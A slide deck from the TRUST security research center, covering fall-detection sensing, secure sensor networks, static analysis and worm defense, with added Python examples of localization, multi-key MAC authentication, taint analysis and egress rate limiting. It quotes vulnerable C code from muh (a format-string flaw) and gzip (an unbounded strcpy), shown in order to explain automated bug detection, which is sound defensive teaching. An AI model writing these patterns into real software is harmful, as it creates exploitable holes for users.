ITALH System (diagram): fall detector and sensors connect over RS-232 and Zigbee to Berkeley Motes; the motes report (e.g. via a Bluetooth sender) to a mobile gateway (mobile phone with integrated camera) or a home health system; these reach the hospital (terminal, WLAN) over the Internet and/or telephone. Access control, data aggregation, privacy and security are marked as cross-cutting concerns.

ITALH/EMR Development: use Berkeley Motes, fall sensors with accelerometers.

Page 32

Berkeley ITALH Testbed

Initial Focus: Fall Detection
– Falls are the leading cause of fatal and nonfatal injuries to older people in the U.S.
– Each year, more than 11 million people over 65 fall: one of every three senior citizens
– Treatment of the injuries and complications associated with these falls costs the U.S. over $20 billion annually

Requirements of such a system:
– Privacy of data and of user activity, location, etc.
– Accuracy and robustness
– Interoperability, as it will form only one component of a broader system

Secondary Foci:
– The devices reveal significant information about the user
– This provides significant additional opportunities for health monitoring
– It also creates a potential threat to the user's privacy

Daily Activity Identification: sitting, standing, walking

Page 33

Berkeley ITALH Testbed

Being able to measure and analyze a patient's activity enables:
– Accurate feedback for at-home treatment, e.g. osteoporosis, where a clear negative correlation has been shown between activity level and bone density loss
– Rapid and automated response to critical and emergency situations

This benefit can only be had on a societal scale if such devices can be integrated into the EMR systems, so that:
– Data acquisition is at least semi-autonomous
– The data can be guaranteed to be accurate
– The system is secure

ITALH/EMR Development (diagram): mobile system and home system feed an ITALH/openEMed client, which talks to an openEMed server and an openEMed physician client (development and testing); the target implementation connects to the healthcare provider's EMR, MyHealth.

Protocols and policies must be established for the inclusion of automated data collection
– A test system is being developed to integrate the ITALH testbed with an open source EMR system
– This will be integrated with the Vanderbilt MyHealth system following initial development

Page 34

Summary

Excellent integrative project candidate

Strong interest inside TRUST and in the medical community

We have teamed up with VUMC, which has the strongest research program and operational testbed

Rapid start-up

Page 35

Problem 3: Embedded Secure Sensor Networks

TRUST is engaged in the development of embedded secure sensor networks
– Integrated center R&D at all levels: sensor technology, networks, applications, policy/legal issues

Activity at all TRUST sites + collaborators
– Oak Ridge National Laboratory, …

Page 36

Societal Relevance

Health Care

Urban Infrastructure

Utilities
– Energy production and transport (e.g. SCADA)
– Energy utilization monitoring in homes

Search and Rescue
– Disaster response

Heavy Industry Process Control
– Oil refineries, chemical, etc.
– Chevron is an interested player

Border Control and Monitoring

Page 38

Sensor Technology - The Mote

Page 39

Sensor Technology Example: Sensors for Bio-Defense

Bi-layer lipid membrane used to create designer bio-sensors
– When the target analyte binds to the protein, ion channel conductivity increases.

Currently considering use in water supply protection.

Sensor performance statistics used to define networking requirements.

Outside player: NY Dept of Health / Wadsworth Laboratories

(Figure of the sensor; labels: cis compartment, trans compartment, lipid bilayer, ion channel, metallic gate.)

Page 40

Sensor Platform Technologies

CU Asynchronous Processor
– Event-driven execution is ideal for sensor platforms

Clockless logic
– Spurious signal transitions (wasted power) eliminated
– Hardware only active if it is used for the computation

MIPS: high-performance
– 24 pJ/instruction and 28 MIPS @ 0.6 V

Processor     Bus   Year   E/op      Ops/sec
Atmel         8     200?   1-4 nJ    4 MIPS
StrongARM     32    200?   1.9 nJ    130 MIPS
MiniMIPS      32    1998   2.3 nJ*   22 MIPS
Amulet3i      32    2000   1.6 nJ*   80 MIPS
80C51 (P)     8     1998   1 nJ**    4 MIPS
Lutonium      8     2003   43 pJ     4 MIPS
SNAP          16    2003   24 pJ     28 MIPS

Page 41

Designer OS for Sensor Networks

TinyOS
– Large, active open source community: 500 research groups worldwide
– OEP for DARPA Network Embedded Systems Technology
– Thousands of active implementations: the world's largest (distributed) sensor testbed

MagnetOS: provide a unifying single-system image abstraction
– The entire network looks like a single Java virtual machine
– MagnetOS performs automatic partitioning: converts applications into distributed components that communicate over a network
– MagnetOS provides transparent component migration: moves application components within the network to improve performance metrics

(Figure: MagnetOS Rewriter)

Page 42

Sextant: Node Localization

Use of large numbers of randomly distributed nodes creates a need to discover geographic location
– GPS is bulky, expensive, power-hungry

Set up a set of geographic constraints and solve it in a distributed fashion
– Aggressively extract constraints
– Use just a few landmarks (e.g. GPS nodes) to anchor the constraints

Can determine node location with good accuracy, without GPS or other dedicated hardware
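The constraint idea in a runnable form, as an added example that is not the Sextant implementation (Sextant works with Bézier-bounded regions and also uses negative "cannot hear" constraints, neither of which a box can express). Here a node's possible location is a bounding box: hearing a landmark at (x, y) with radio range r confines the node to [x-r, x+r] x [y-r, y+r]; hearing a non-landmark neighbour confines it to that neighbour's current box grown by r. Boxes are intersected repeatedly until nothing changes, which is the fixed point the distributed propagation converges to. The field size, radio range, landmark positions and links are constructed.

```python
"""Bounding-box constraint propagation for node localization (added example)."""
AREA = (0.0, 0.0, 100.0, 100.0)  # deployment field (assumption)
RADIO_RANGE = 30.0                # assumption


def expand(box, r):
    x0, y0, x1, y1 = box
    return (x0 - r, y0 - r, x1 + r, y1 + r)


def intersect(a, b):
    return (max(a[0], b[0]), max(a[1], b[1]), min(a[2], b[2]), min(a[3], b[3]))


def localize(landmarks: dict, links: set, radio_range=RADIO_RANGE, area=AREA) -> dict:
    """landmarks: {id: (x, y)} with known positions; links: set of
    frozenset({a, b}) for pairs that hear each other. Returns a box per unknown node."""
    boxes = {lm: (x, y, x, y) for lm, (x, y) in landmarks.items()}
    nodes = {n for link in links for n in link} - set(landmarks)
    for n in nodes:
        boxes[n] = area  # no information yet: anywhere in the field
    changed = True
    while changed:  # iterate to a fixed point; each pass only shrinks boxes
        changed = False
        for link in links:
            a, b = tuple(link)
            for me, other in ((a, b), (b, a)):
                if me in landmarks:
                    continue
                new = intersect(boxes[me], expand(boxes[other], radio_range))
                if new != boxes[me]:
                    boxes[me], changed = new, True
    return {n: boxes[n] for n in nodes}


def contains(box, point) -> bool:
    x, y = point
    return box[0] <= x <= box[2] and box[1] <= y <= box[3]


def area_of(box) -> float:
    return max(0.0, box[2] - box[0]) * max(0.0, box[3] - box[1])


# Constructed scenario: three GPS landmarks, node N hears L1, node M hears only N.
LANDMARKS = {"L1": (0.0, 0.0), "L2": (100.0, 0.0), "L3": (0.0, 100.0)}
LINKS = {frozenset({"L1", "N"}), frozenset({"N", "M"})}
TRUE_POSITIONS = {"N": (20.0, 10.0), "M": (45.0, 20.0)}  # for checking only

if __name__ == "__main__":
    for node, box in localize(LANDMARKS, LINKS).items():
        print(node, box, "contains true position:", contains(box, TRUE_POSITIONS[node]))
```

Every constraint here comes from an unauthenticated radio observation, so a node that lies about hearing a landmark, or a landmark whose beacon is spoofed, shifts every dependent box; that is the "bogus tracking results" entry in the vulnerability list later in the deck.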

Page 43

SHARP: Hybrid Routing Protocol

Two extremes in routing
– Proactive: disseminate routes regardless of need
– Reactive: discover routes when necessary

Neither is optimal for dynamic sensor networks

SHARP adaptively finds the balance point between reactive and proactive routing
– Enables multiple nodes in the network to optimize the routing layer for different metrics
– Outperforms purely reactive and proactive approaches across a range of network conditions

Page 44

Securing the Sensor Network

Security issues
– Develop a taxonomy of attacks: attacks with and without defined defenses; generic basis on which to evaluate new networks
– Characterizing worst-case results: statistical learning proposed as a means for determining what can be inferred from data
– Evaluate privacy concerns: ties into the privacy road map

Security thrusts
– Secure building blocks: secure key distribution, secure node-to-node and broadcast communication, secure routing, secure information aggregation
– Real-time aspects and security
– Secure middleware
– Secure information processing
– Sensing biometrics
– Sensor database processing
– Internet-scale sensor networks

Page 45

Application Projects (Examples)

Patient Monitoring
– Remote monitoring of cardiac patients
– See Vanderbilt/Cornell/Berkeley poster

Museum Project
– Expressive AI projects using sensors to monitor patrons at public demonstrations

Home Sensor Network Development
– Energy monitoring beyond metering
– Opportunities for local information fusion

LA Water Supply Protection
– BioSensors + Networking + Civil Infrastructure

Page 46

Research Spotlight

TRUST-ORNL TuFNet: Federated Sensor Networks Project

Akos Ledeczi (ISIS-VU), Yuan Xue (ISIS-VU), ORNL

TRUST researchers, graduate students, ORNL researchers

Page 47

Dirty Bomb Detection Demo in VU Stadium, April 20, 2006

Outside the window:
– Jumbotron: automatic camera feed
– Jumbotron/Screen: tracking info inside Google Earth

A security guard walks around the stadium with a cell-phone-connected radiation detector and an XSM mote.

His position is continuously tracked using a radio interferometric technique running on the motes.

A camera automatically tracks his position using the geolocation info from the mote network. When the radiation level crosses a threshold, the detector sends an alarm and the camera zooms in on the position.

Page 48

System Vulnerabilities

(Diagram of the demo system: rad detector, mobile phone and mote; mote network; Nextel/Internet; tracking service and user interface; rad level servlet and camera glue code; camera control node (Linux); Jumbotron controller; VGA to NTSC adapter.)

Sensor network vulnerabilities, by layer:
– Physical: jamming, battery consumption attack
– MAC/Link: MAC DoS, eavesdropping
– Network: packet dropping, mis-forwarding, ID spoofing, forging routing information
– Application/Service: bogus tracking results, tracking command spoofing, disclosing/modifying/replaying tracking results

Traditional network/system vulnerabilities (Internet side):
– Denial of service attack
– Information disclosing/modification/replaying
– Address spoofing
– etc.

Page 49

Security Support Implemented

Security Support Overview (threat: countermeasure)
– Jamming attack: ranging and tracking using multiple frequencies
– Bogus tracking result: majority-based voting to filter out-of-range results; peer authentication among sensors
– False tracking command, injection of tracking results from spoofed sensors: peer authentication among sensors

Group-based Peer Authentication
– Objective: provide efficient, effective, and flexible peer sensor authentication
– Solution: symmetric-key based (SkipJack in TinySec)
  Each sensor node holds a different set of keys, assigned through a key pre-distribution scheme
  Multiple MACs are generated for each message from a sensor node, one per key the sender holds
  MACs are verified at the receiving sensor using the keys it has in common with the sender
– Results: MAC computation 5.3 ms; verification 2.5 ms (2 common keys), 1.3–1.4 ms (1 shared key), < 0.1 ms (no keys in common)
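A worked version of the multi-MAC scheme just described, added here as an example and not the TRUST/TinySec code: HMAC-SHA256 from the Python standard library stands in for the SkipJack-based MAC of TinySec, and the pool size, ring size, 4-byte tag length and the hand-picked key rings in demo() are assumptions of this example.

```python
import hashlib
import hmac
import random

# Added example, not the TRUST/TinySec implementation. The slide describes
# SkipJack-based MACs in TinySec; HMAC-SHA256 from the standard library is
# substituted here. Pool size, ring size and the 4-byte MAC truncation are
# illustrative assumptions.
KEY_POOL_SIZE = 12
KEYS_PER_NODE = 3
MAC_LEN = 4


def make_key_pool(n=KEY_POOL_SIZE):
    # Deterministic, constructed keys so the run is reproducible. A deployment
    # draws them from a CSPRNG before the motes are programmed.
    return {kid: hashlib.sha256(b"demo-pool-key-%d" % kid).digest()[:16]
            for kid in range(n)}


def assign_ring(pool, k, rng):
    """Random key pre-distribution: a node receives k key ids drawn from the pool."""
    ids = rng.sample(sorted(pool), k)
    return {kid: pool[kid] for kid in ids}


def tag(key, kid, msg):
    # The key id is bound into the MAC input, so a tag computed under one key
    # cannot be presented as a tag under another.
    return hmac.new(key, bytes([kid]) + msg, hashlib.sha256).digest()[:MAC_LEN]


def sign(ring, msg):
    """Sender emits one MAC per key it holds, as a list of (key_id, tag)."""
    return [(kid, tag(key, kid, msg)) for kid, key in sorted(ring.items())]


def verify(ring, msg, tags):
    """Receiver checks each tag whose key it also holds.

    Returns (verdict, checked). verdict is True if every common-key tag matched,
    False on any mismatch, and None when the two rings share no key: the
    message cannot be authenticated at all (the '< 0.1 ms' case on the slide).
    """
    checked = 0
    for kid, t in tags:
        key = ring.get(kid)
        if key is None:
            continue
        checked += 1
        if not hmac.compare_digest(t, tag(key, kid, msg)):
            return False, checked
    return (True, checked) if checked else (None, 0)


def demo():
    pool = make_key_pool()
    # Hand-picked rings rather than assign_ring() so the overlaps are visible.
    alice = {kid: pool[kid] for kid in (0, 1, 2)}
    bob = {kid: pool[kid] for kid in (2, 3, 4)}     # shares key 2 with alice
    carol = {kid: pool[kid] for kid in (5, 6, 7)}   # shares no key with alice
    eve = {kid: pool[kid] for kid in (3, 4, 8)}     # shares keys 3 and 4 with bob
    msg = b"track seq=17 node=alice x=12.5 y=7.0"   # constructed tracking report
    tags = sign(alice, msg)
    tampered = msg.replace(b"x=12.5", b"x=99.0")
    return {
        "bob_accepts": verify(bob, msg, tags),
        "bob_rejects_tampered": verify(bob, tampered, tags),
        "carol_cannot_check": verify(carol, msg, tags),
        # eve holds no key alice holds, so a guessed tag under key 2 fails ...
        "eve_forges_alice": verify(bob, msg, [(2, bytes(MAC_LEN))]),
        # ... but tags under eve's own keys do verify at bob: the scheme proves
        # "sent by a holder of key 3 or 4", not "sent by alice".
        "eve_as_herself": verify(bob, msg, sign(eve, msg)),
        "random_ring_size": len(assign_ring(pool, KEYS_PER_NODE, random.Random(7))),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

verify() returns None rather than False when sender and receiver share no key: that message is unauthenticated, not forged, and the upper layer has to decide whether to accept it or route it through a neighbour that does share a key. The last two entries of demo() are the caveat a reviewer should raise about any random key pre-distribution scheme: a valid tag proves the sender holds a key from the pool, not which node it is, so a node id carried inside the message is still unauthenticated unless key assignment is tied to identity.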

Page 50

Privacy Issues

Policy instruments often lag technology development
Proposed development of a Privacy Road Map that will front-load policy development
– Map sensor capabilities and network mission into deployment and data use rules
– Key near-term: RFIDs, broad-based visual surveillance
– Raises the issue of the impact of network configuration and heterogeneity on the road map

Approach: extend fair information practices to cover sensor nets at the regulatory or legislative level
– Consent enablement is an important issue

Page 51

Economic Issues

Consider standards for transactions between sensor network owners/operators
– Market creation, bargaining, trading rules for passing data, avoiding monopolies

Open platforms enhance markets, range of products, efficiency
– Software for computers vs. software for cell phones

Significant literature on economic costs of privacy decision making
– Cost of inadvertent disclosure

Page 52

Further Development

Integrate cross-cutting security, privacy, and economic issues into ongoing project development.

Try to stay as generic as possible, while developing technology/policy amenable to evaluation.

Page 53

Problem 4: Trustworthy Systems

Important problems in the public eye
– Why are computer systems vulnerable to attack? Many security vulnerabilities are software bugs
– How can we make systems more secure? Better human factors, security science and engineering practices

Four core areas
– Robust software: including static and dynamic analysis methods for detecting vulnerabilities
– Security policy: what actions should be allowed? How to express and enforce policy?
– Platform integrity: including hardware attestation, software-based isolation, virtualization
– Intrusion-tolerant systems: system architectures and implementation techniques so that systems will resist and survive attacks

Page 54

Subarea 1. Robust software

Computer attacks are a serious problem
– Scripts for exploiting known vulnerabilities
– Techniques and tools for creating new exploits

Many possible targets
– Widely used UNIX programs: sendmail, BIND, etc.
– Various server-type programs: ftp, http (Web server and file transfer); pop, imap (email servers); irc, whois, finger (other applications, services)
– Mail clients (overrun filenames for attachments): Netscape mail (7/1998), MS Outlook mail (11/1998)

Page 55

Research Spotlight

Monica Lam: Automated Software Analysis
– Find errors that can lead to vulnerabilities

Page 56

Static Analysis

D. Wagner – Detection of Buffer Overrun Vulnerabilities
– Integer range analysis problem
– Sendmail: 4 bugs / 44 warnings
– Features necessary to achieve better precision: flow sensitivity, pointer analysis

M. Lam – Combine and improve previous results
– Interprocedural methods
– Strategically leverage more precise aliasing analysis
– Standard architecture for combining methods
– Today: B. Livshits poster

A. Aiken – Format String Vulnerabilities, Type Qualifiers
– "Tainted" annotations: requires some, infers the rest
– Features necessary to achieve better precision: context sensitivity, field sensitivity

[Diagram: Program → IP SSA → data flow analyses, producing buffer overruns, format violations, NULL dereferences and error traces; …others… easy to write tools, can add new analyses]

Page 57

Example: Tainting Violation in muh

muh.c (source: fgets() fills s at line 839; s is then passed, unchanged, as the format argument of irc_notice() at line 841):

0838             s = ( char * )malloc( 1024 );
0839             while( fgets( s, 1023, messagelog ) ) {
0840                 if( s[ strlen( s ) - 1 ] == '\n' ) s[ strlen( s )...
0841                 irc_notice( &c_client, status.nickname, s );
0842             }
0843             FREESTRING( s );
0844
0845             irc_notice( &c_client, status.nickname, CLNT_MSGLOGEND );

irc.c (sink: the tainted string is used as the format of vsnprintf() at line 263):

257 void irc_notice(connection_type *connection, char nickname[], char *format, ... )
258 {
259     va_list va;
260     char buffer[ BUFFERSIZE ];
261
262     va_start( va, format );
263     vsnprintf( buffer, BUFFERSIZE - 10, format, va );
264     va_end( va );

Trace: muh.c:839 (source) → muh.c:841 (call) → irc.c:263 (sink)

Page 58

Example: Buffer Overrun in gzip

gzip.c (source: a command-line argument enters at line 593 and is passed down two calls):

0589     if (to_stdout && !test && !list && (!decompress || ...
0590         SET_BINARY_MODE(fileno(stdout));
0591     }
0592         while (optind < argc) {
0593         treat_file(argv[optind++]);

0704 local void treat_file(iname)
0705     char *iname;
0706 {
...
0716     if (get_istat(iname, &istat) != OK) return;

0997 local int get_istat(iname, sbuf)
0998     char *iname;
0999     struct stat *sbuf;
1000 {
...
1009     strcpy(ifname, iname);

Trace: gzip.c:593 → gzip.c:716 → gzip.c:1009 (unbounded strcpy of an attacker-chosen filename into the ifname buffer)

The analysis needs a model of strcpy (its source argument flows, unbounded, into its destination) to report this.
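The two traces above are what an interprocedural taint analysis produces. The following is an added example, not the Stanford or Berkeley tools' code: a toy, context-insensitive taint propagation over a hand-written IR of the muh and gzip call chains shown on the slides, with a library-model table (the "model of strcpy" the slide mentions) as the source/sink specification. The file:line locations and identifiers are the slides'; the IR encoding and the library models are assumptions of this example.

```python
from collections import namedtuple

# Added example, not the Stanford or Berkeley tools' code: a deliberately small,
# context-insensitive interprocedural taint analysis over a hand-built IR of the
# two traces shown on the slides. File:line locations, identifiers and the two
# call chains come from the slides; the IR encoding and library models are
# assumptions of this example.
Func = namedtuple("Func", "params stmts")   # stmts: (location, callee, [argument names])

# Library models. Without the strcpy entries the gzip bug cannot be reported:
# this table is the "model of strcpy" the slide asks for.
SOURCES = {"fgets": [0], "read": [1], "recv": [1]}        # arg index filled with untrusted data
PROPAGATE = {"strcpy": [(1, 0)], "strcat": [(1, 0)], "strncpy": [(1, 0)]}   # (from arg, to arg)
SINKS = {                                                  # callee -> (arg index, bug class)
    "vsnprintf": (2, "format string"), "vsprintf": (2, "format string"),
    "printf": (0, "format string"), "syslog": (1, "format string"),
    "strcpy": (1, "buffer overrun"), "strcat": (1, "buffer overrun"),
}
ENTRY_TAINT = {"main": ["argv"]}                            # program input is tainted from the start


def _mark(tainted, var, trace):
    """Record var as tainted with an explanatory trace; True if this is new."""
    if var in tainted:
        return False
    tainted[var] = trace
    return True


def analyze(program):
    """Return {(sink location, bug class): trace} for tainted values reaching a sink.

    taint[f][v] is a tuple of steps explaining how variable v of function f
    became tainted; traces cross function boundaries through parameter binding.
    """
    taint = {f: {} for f in program}
    for f, names in ENTRY_TAINT.items():
        for v in names:
            _mark(taint.setdefault(f, {}), v, ("%s: %s is program input" % (f, v),))
    findings = {}
    changed = True
    while changed:                          # iterate to a fixpoint over all functions
        changed = False
        for fname, func in program.items():
            tf = taint[fname]
            for loc, callee, args in func.stmts:
                for i in SOURCES.get(callee, []):
                    step = "%s: %s() writes untrusted data into %s" % (loc, callee, args[i])
                    changed |= _mark(tf, args[i], (step,))
                for src, dst in PROPAGATE.get(callee, []):
                    if args[src] in tf:
                        step = "%s: %s() copies %s into %s" % (loc, callee, args[src], args[dst])
                        changed |= _mark(tf, args[dst], tf[args[src]] + (step,))
                if callee in SINKS:
                    idx, kind = SINKS[callee]
                    if args[idx] in tf and (loc, kind) not in findings:
                        step = "%s: %s() %s sink reached by %s" % (loc, callee, kind, args[idx])
                        findings[(loc, kind)] = tf[args[idx]] + (step,)
                if callee in program:       # bind actual arguments to the callee's formals
                    for formal, actual in zip(program[callee].params, args):
                        if actual in tf:
                            step = "%s: %s() binds %s to %s" % (loc, callee, actual, formal)
                            changed |= _mark(taint[callee], formal, tf[actual] + (step,))
    return findings


# muh as on the slide: fgets() fills s (muh.c:839), s becomes irc_notice's format
# parameter (muh.c:841), and the format reaches vsnprintf (irc.c:263).
MUH = {
    "main": Func([], [
        ("muh.c:839", "fgets", ["s", "1023", "messagelog"]),
        ("muh.c:841", "irc_notice", ["c_client", "status.nickname", "s"]),
    ]),
    "irc_notice": Func(["connection", "nickname", "format"], [
        ("irc.c:263", "vsnprintf", ["buffer", "BUFFERSIZE-10", "format", "va"]),
    ]),
}
# The fix: pass a literal "%s" as the format and s as a vararg, which is never
# bound to the format formal.
MUH_FIXED = {
    "main": Func([], [
        ("muh.c:839", "fgets", ["s", "1023", "messagelog"]),
        ("muh.c:841", "irc_notice", ["c_client", "status.nickname", '"%s"', "s"]),
    ]),
    "irc_notice": MUH["irc_notice"],
}
# gzip as on the slide: argv[optind++] enters treat_file (gzip.c:593), is passed
# on to get_istat (gzip.c:716) and copied with strcpy (gzip.c:1009).
GZIP = {
    "main": Func(["argc", "argv"], [("gzip.c:593", "treat_file", ["argv"])]),
    "treat_file": Func(["iname"], [("gzip.c:716", "get_istat", ["iname", "istat"])]),
    "get_istat": Func(["iname", "sbuf"], [("gzip.c:1009", "strcpy", ["ifname", "iname"])]),
}


if __name__ == "__main__":
    for name, prog in (("muh", MUH), ("muh (fixed)", MUH_FIXED), ("gzip", GZIP)):
        found = analyze(prog)
        print(name, "warnings:", len(found))
        for (loc, kind), trace in found.items():
            print("  %s at %s\n    " % (kind, loc) + "\n    ".join(trace))
```

Two things the toy makes visible that the slides only state: the gzip warning disappears entirely if the strcpy rows are removed from PROPAGATE and SINKS, and the muh warning disappears once the literal "%s" occupies the format parameter, because the analysis is about which values can reach the format slot, not about how long s is. Being context-insensitive, the toy would also merge taint from every call site of irc_notice(); the context sensitivity listed for Aiken's analysis exists precisely to avoid the resulting false positives.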

Page 59

Sample Experimental Results

Monica Lam study: 7 server-type programs

Program    Version   # LOC   Procedures
lhttp      0.1         888       21
bftpd      1.0.11    2,946       47
trollftpd  1.26      3,584       48
man        1.5h1     4,139       83
cfingerd   1.4.3     5,094       66
muh        2.05d     5,695       95
gzip       1.2.4     8,162       93

Program    Total     Buffer overruns /   False positives  Number of  Number of  Definitions  Procedures  Tool's
name       warnings  format violations                    sources    sinks      spanned      spanned     runtime (sec)
lhttpd     1         1                   20 (w/o preds)   4          1          7            4           7.08
bftpd      2         1 + 1               -                5          2          5,7          1,3         2.34
trollftpd  1         1                   -                4          1          23           5           8.52
man        1         1                   -                3          1          6            4           9.67
cfingerd   1         1                   -                4          1          10           4           7.44
muh        1         1                   -                3          1          7            3           7.52
gzip       1         1                   -                3          1          7            5           2.03
(- = none reported; the slide's separate overrun and format-string columns cannot be recovered for the single-warning rows. The muh warning is the format string violation and the gzip warning the buffer overrun shown on the preceding slides.)

Other studies (Engler, Wagner, etc.) achieve similar results for other kinds of errors

Significant bugs found using automated tools

TRUST challenge: compare and combine methods developed by different campuses

Page 60

Larger Picture

Goal: new techniques for improving the security of our software
– Many complementary approaches: static analysis of source code; dynamic analysis with symbolic execution; taint and information flow tracking; inline reference monitors; proof-carrying code; logical decision procedures; semantics and foundations of programming languages
– Many exciting uses: detection of security bugs; automatic generation of signatures for intrusion detection or virus scanning; verification of security properties

TRUST Collaboration
– Many cross-institution collaborations underway / recently initiated
– Challenge applications to demonstrate our methods: hardening the security of open source software; protecting network services/servers against data-driven remote attacks; improving the quality of electronic voting software
– Shared benchmarks: Apache (including core, plug-ins, PHP scripts, …); TCP/IP stacks; network servers? One or two key industrial applications? (Productivity software? Medical? E-commerce? Internet services?)

Page 61

Partner: Coverity, Inc

Stanford, Symantec, Coverity, DHS Open Source Software Quality Project

Page 62

Subarea 2. Security policy

Access policy
– How to express, enforce policy?
– Policy lifecycle management (debugger, etc.)

Enforcement
– Control access and propagation, e.g., Java stack inspection: what code to trust?
– How to enforce end-to-end policy? e.g., information I cannot be transmitted to output O
  Access control mechanisms are necessary, but access control policies are insufficient

Page 63

Enforcing language-based security

Programs are annotated with security policies

Compiler checks, and possibly transforms, the program to ensure that all executions obey the rules

Loader and run-time system validate the program policy against system policies

[Diagram: source code + policy → (compiler) → target code + policy → (loader / run-time check, "?") → executable code, validated against the system policy]

Page 64

Subarea 3. Platform integrity

Trusted platforms and attestation
– "Trusted platforms" refers to platforms in which the running software has been authenticated as having desirable attributes
– "Attestation" refers to authenticating the software running on a node remotely

Example projects
– Nexus OS implementing new trustworthy computing abstractions (Cornell)
– Privacy-preserving attestation (Stanford)
– TERRA attestation of full virtual machines (Stanford)
– Software attestation (CMU)
– Trusted user input/output (CMU, Stanford)

Page 65

Subarea 4. Intrusion-tolerant systems

Sample direction: distributed trust
– Implement services in a distributed fashion so that no one component is trusted

Example projects
– In P2P systems that mask node misbehaviors (Cornell): prevents injecting a name into CODONS (a DNS replacement); prevents injecting a page into Cobweb (Akamai-like web cache); prevents injecting bad info into Corona (news system for the web)
– In certificate authorities and single sign-on (Cornell)
– In storage systems (Stanford, CMU)
– Underlying protocols for service deployment, access (CMU)
– Formal verification of distributed trust protocols (Cornell)
– Implementing default-disconnect in LANs (Stanford)

Page 66

Problem 5: Network Security

Networked applications are susceptible to attack
– Develop secure methods for resisting network attacks
  Cryptography is powerful, but requires key management; examples: SSL/TLS, VPN, key management for IPsec
– New applications raise new challenges, e.g. VoIP

Network infrastructure is susceptible to attack
– DoS, virus and worm propagation flood the network and block traffic
– Authenticated access to wireless networks
– Isolation (traffic shaping, firewalls), intrusion detection

Goals include:
– Improve security of networks and applications that use them
– Collaborate on next-generation networking
– Improve educational resources on network security

Page 67

Example True SCADA Scenarios

Port of Houston, 20 Sept 2001
– >1 billion containers (2000), 6,400 ships (2002), $11 billion revenue (2002)
– $15 billion petrochemical complex: largest in the nation, second in the world
– Web site disabled by a denial of service attack
– 19-year-old UK teenage member of a group called Allied Haxor Elite trying to get back at a girl he met in a chatroom (found not guilty)

Ohio's Davis-Besse nuclear power plant, offline, Jan 2003
– Slammer worm penetrated a private computer network and disabled a safety monitoring system for ~5 hours
– Penetrated the unsecured network of an unnamed Davis-Besse contractor, then squirmed through a T1 line bridging that network and Davis-Besse's corporate network

Northeast power outage, 50 million people, August 2003
– MSBlaster worm crippled key detection systems and delayed response during a critical time: "significantly worsened the effect of the outage"

Page 68

General Network Threats

Worms/Viruses – Propagation

Hackers/Intruders – Infiltration

Compromised Machines – Botnets

Insider Threat – Exfiltration

Page 69

Research Spotlight

Worm/DoS Defense: one slice of network security research in TRUST

Page 70

Can We Build a "DoS Firewall"?

[Figure: example of the efficacy of published DoS filters; two curves, one for a filter trained on attack & normal traffic, one for a filter trained on normal traffic only]

[Collins & Reiter]

Page 71

Egress Limiting for Worm Containment

Detection: large fan-out, increased failures, no DNS translations
Containment: rate limiting

[Wong, Studer, Bielski & Wang]
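An added example (not the CMU egress-limiting system's code) of the three detection signals named above evaluated over constructed flow and DNS records, with a token-bucket throttle on new connections as the containment step. The thresholds, the record layout and the throttle parameters are assumptions of this example.

```python
from collections import defaultdict, deque

# Added example, not the CMU egress-limiting system's code. The three signals
# (fan-out, failure rate, destinations with no DNS translation) are from the
# slide; the thresholds, record layout and the token-bucket throttle are
# assumptions of this example.
WINDOW_S = 10.0          # sliding window over each internal host's connection attempts
FANOUT_LIMIT = 20        # distinct destination IPs in the window before a host is suspect
FAIL_RATIO = 0.5         # share of attempts that failed (RST, ICMP unreachable, timeout)
UNRESOLVED_RATIO = 0.8   # share of destinations the host never received in a DNS answer
NEW_CONN_RATE = 1.0      # new connections per second allowed to a contained host
BUCKET_CAP = 5           # burst allowance for a contained host


class EgressMonitor:
    def __init__(self):
        self.resolved = defaultdict(set)    # host -> IPs seen in DNS answers to that host
        self.attempts = defaultdict(deque)  # host -> (ts, dst_ip, ok, resolved) in the window
        self.bucket = {}                    # host -> (tokens, last_ts) once contained

    def observe_dns(self, ts, host, answer_ip):
        self.resolved[host].add(answer_ip)

    def observe_conn(self, ts, host, dst_ip, ok):
        q = self.attempts[host]
        q.append((ts, dst_ip, ok, dst_ip in self.resolved[host]))
        while q and ts - q[0][0] > WINDOW_S:
            q.popleft()

    def assess(self, host):
        """Score the host's recent behaviour; None if nothing was observed."""
        q = self.attempts[host]
        if not q:
            return None
        fanout = len({dst for _, dst, _, _ in q})
        fail_ratio = sum(1 for _, _, ok, _ in q if not ok) / len(q)
        unresolved = sum(1 for _, _, _, r in q if not r) / len(q)
        # Fan-out alone is not enough (a crawler or mail relay is legitimately
        # busy); it must combine with failures or DNS-less targets.
        contain = fanout >= FANOUT_LIMIT and (fail_ratio >= FAIL_RATIO or unresolved >= UNRESOLVED_RATIO)
        return {"fanout": fanout, "fail_ratio": round(fail_ratio, 2),
                "unresolved": round(unresolved, 2), "contain": contain}

    def allow_new_connection(self, ts, host):
        """Containment: token-bucket rate limit on new connections from a suspect host."""
        verdict = self.assess(host)
        if not verdict or not verdict["contain"]:
            return True
        tokens, last = self.bucket.get(host, (BUCKET_CAP, ts))
        tokens = min(BUCKET_CAP, tokens + (ts - last) * NEW_CONN_RATE)
        allowed = tokens >= 1.0
        self.bucket[host] = (tokens - 1.0 if allowed else tokens, ts)
        return allowed


def sample_records():
    """Constructed records, not captured traffic: (ts, kind, host, ip, ok)."""
    recs = []
    clean, infected = "10.0.0.5", "10.0.0.9"
    for i, ip in enumerate(("93.184.216.34", "198.51.100.20", "203.0.113.8")):
        recs.append((0.1 * i, "dns", clean, ip, True))            # resolves first ...
        recs.append((1.0 + i, "conn", clean, ip, True))            # ... then connects
    recs.append((2.5, "conn", clean, "93.184.216.34", True))
    recs.append((3.0, "conn", clean, "203.0.113.8", False))
    for i in range(30):                                            # scanner: no DNS, half fail
        recs.append((1.0 + 0.2 * i, "conn", infected, "10.1.%d.%d" % (i // 8, i % 8 + 1), i % 2 == 0))
    return sorted(recs)


def run(records):
    mon = EgressMonitor()
    for ts, kind, host, ip, ok in records:
        if kind == "dns":
            mon.observe_dns(ts, host, ip)
        else:
            mon.observe_conn(ts, host, ip, ok)
    return mon


def burst_allowed(mon, host, ts, n):
    """How many of n back-to-back new connections at time ts get through."""
    return sum(1 for _ in range(n) if mon.allow_new_connection(ts, host))


if __name__ == "__main__":
    mon = run(sample_records())
    for host in ("10.0.0.5", "10.0.0.9"):
        print(host, mon.assess(host), "burst of 8 ->", burst_allowed(mon, host, 8.0, 8), "allowed")
```

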